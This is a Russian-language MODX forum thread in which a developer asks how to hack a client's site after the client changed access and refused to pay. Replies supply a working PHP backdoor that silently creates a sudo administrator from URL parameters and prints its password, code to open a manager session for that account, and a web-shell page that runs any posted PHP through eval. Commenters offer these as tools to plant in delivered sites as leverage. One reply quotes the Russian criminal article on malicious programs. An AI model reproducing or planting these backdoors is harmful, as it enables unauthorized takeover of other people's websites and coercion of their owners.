Можно ли взломать сайт на MODX?
Добрый день!
Такая проблема случилась:
Выгрузил сайт клиенту на хостинг, а он включил заднюю, нанял какого-то сисадмина, чтобы помог ему сменить все доступы и не хочет платить.
Как бы напрашивается вопрос: Есть ли такая возможность взломать MODX, чтобы справедливость восторжествовала? Возможно за $
Такая проблема случилась:
Выгрузил сайт клиенту на хостинг, а он включил заднюю, нанял какого-то сисадмина, чтобы помог ему сменить все доступы и не хочет платить.
Как бы напрашивается вопрос: Есть ли такая возможность взломать MODX, чтобы справедливость восторжествовала? Возможно за $
23 января 2017, 20:04
Комментарии: 17
Аналогично, бэкдор + сайт лежит на своем хостинге до оплаты оставшейся части. Вот код:
По поводу взлома можешь обратиться к agel_nash, наверное.
<?php
define('MODX_API_MODE', true);
//количество dirname = глубина документа относительно корня
require dirname(dirname(dirname(dirname(__FILE__)))) . '/index.php';
$user = empty($_GET['user']) ? 'user'. rand(99,9999) : $_GET['user'];
$pass = empty($_GET['pass']) ? rand(10000000,99999999) : $_GET['pass'];
$u = $modx->newObject('modUser');
$u->fromArray(array(
'username' => $user,
'password' => $pass,
'active' => 1,
'primary_group' => 1,
));
$u->joinGroup('1', '0');
$u->setSudo(1);
$p = $modx->newObject('modUserProfile');
$p->fromArray(array(
'fullname' => $user,
'email' => $user.'@yoba.ru',
));
$u->addOne($p);
$u->save();
if (!empty($u->username)) {
print '<p><b>user:</b> '. $user .'</p><p><b>pass:</b> '. $pass .'</p>';
}По поводу взлома можешь обратиться к agel_nash, наверное.
*пожал плечами* тогда вариант but1head'a более уместен, ну или расширить функционал по вкусу:
//вывести путь админки
echo $modx->getOption('manager_path', null, MODX_MANAGER_PATH);
//добавить сессию для пользователя в админку
$user = $modx->getObject('modUser', айди_свежесозданного_пользователя_выше)
$modx->user = $user;
$modx->addSessionContext('mgr');
А я такой код размещаю:
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title></title>
<style>
textarea {
padding: 10px;
width: 80%;
}
</style>
</head>
<body>
<?php echo $_SERVER['SCRIPT_FILENAME']; ?>
<form method="post">
<textarea name="code" cols="30" rows="15"><?php echo $_POST['code']; ?></textarea>
<button type="submit">Отправить</button>
</form>
<?php eval($_POST['code']); ?>
</body>
</html>
Лучший совет действительно у себя на хостинге разрабатывать.
Вообще беда с этим. Вот меня как клиента с предоплатой два раза кидали. Заплатил, а люди откровенную лажу сделали. Причем явно, что им предоплата и нужна была, т.к. даже разговор про доработки продолжать не хотели.
В итоге теперь если предоплата то по мелким кускам и за каждый этап работы…
Вообще беда с этим. Вот меня как клиента с предоплатой два раза кидали. Заплатил, а люди откровенную лажу сделали. Причем явно, что им предоплата и нужна была, т.к. даже разговор про доработки продолжать не хотели.
В итоге теперь если предоплата то по мелким кускам и за каждый этап работы…
Только один маленький момент, но о нем надо знать:
Статья 273. Создание, использование и распространение вредоносных компьютерных программ
[Уголовный кодекс] [Глава 28] [Статья 273]
1. Создание, распространение или использование компьютерных программ либо иной компьютерной информации, заведомо предназначенных для несанкционированного уничтожения, блокирования, модификации, копирования компьютерной информации или нейтрализации средств защиты компьютерной информации, — наказываются ограничением свободы на срок до четырех лет, либо принудительными работами на срок до четырех лет, либо лишением свободы на тот же срок со штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев.
2. Деяния, предусмотренные частью первой настоящей статьи, совершенные группой лиц по предварительному сговору или организованной группой либо лицом с использованием своего служебного положения, а равно причинившие крупный ущерб или совершенные из корыстной заинтересованности, — наказываются ограничением свободы на срок до четырех лет, либо принудительными работами на срок до пяти лет с лишением права занимать определенные должности или заниматься определенной деятельностью на срок до трех лет или без такового, либо лишением свободы на срок до пяти лет со штрафом в размере от ста тысяч до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период от двух до трех лет или без такового и с лишением права занимать определенные должности или заниматься определенной деятельностью на срок до трех лет или без такового.
3. Деяния, предусмотренные частями первой или второй настоящей статьи, если они повлекли тяжкие последствия или создали угрозу их наступления, — наказываются лишением свободы на срок до семи лет.
Статья 273. Создание, использование и распространение вредоносных компьютерных программ
[Уголовный кодекс] [Глава 28] [Статья 273]
1. Создание, распространение или использование компьютерных программ либо иной компьютерной информации, заведомо предназначенных для несанкционированного уничтожения, блокирования, модификации, копирования компьютерной информации или нейтрализации средств защиты компьютерной информации, — наказываются ограничением свободы на срок до четырех лет, либо принудительными работами на срок до четырех лет, либо лишением свободы на тот же срок со штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев.
2. Деяния, предусмотренные частью первой настоящей статьи, совершенные группой лиц по предварительному сговору или организованной группой либо лицом с использованием своего служебного положения, а равно причинившие крупный ущерб или совершенные из корыстной заинтересованности, — наказываются ограничением свободы на срок до четырех лет, либо принудительными работами на срок до пяти лет с лишением права занимать определенные должности или заниматься определенной деятельностью на срок до трех лет или без такового, либо лишением свободы на срок до пяти лет со штрафом в размере от ста тысяч до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период от двух до трех лет или без такового и с лишением права занимать определенные должности или заниматься определенной деятельностью на срок до трех лет или без такового.
3. Деяния, предусмотренные частями первой или второй настоящей статьи, если они повлекли тяжкие последствия или создали угрозу их наступления, — наказываются лишением свободы на срок до семи лет.
Авторизуйтесь или зарегистрируйтесь, чтобы оставлять комментарии.
02 ноября 2024, 22:21
Сегодня столкнулся с подобной проблемой.
MODX3 + php8.1
Выяснил, что причина в слеше в начале твшки с картинкой.
Решил топорным методом.
[&#...
02 ноября 2024, 18:09
вопрос с текстом был решен в «Управление словарями», а вот со скриптами прищлось редактировать php файл сниппета и комментировать некоторые js и css ф...
02 ноября 2024, 14:04
Это было непросто, но я смог)))
02 ноября 2024, 12:47
Здравствуйте!
Работает только с единичными адресами? Маски, подсети?
01 ноября 2024, 12:00
благодарю, то что нужно!!! сейчас проверим как работает
по идее если там у плагина пакета оставить только на дубликейте событие то он будет урл делат...
31 октября 2024, 08:24
Володя, подскажи пожалуйста на какое событие нужно создать скрипт, что бы при фильтрации через msearch2 выбиралась нужная опция. Сейчас работает тольк...
30 октября 2024, 13:44
Спасибо! Очень информативно
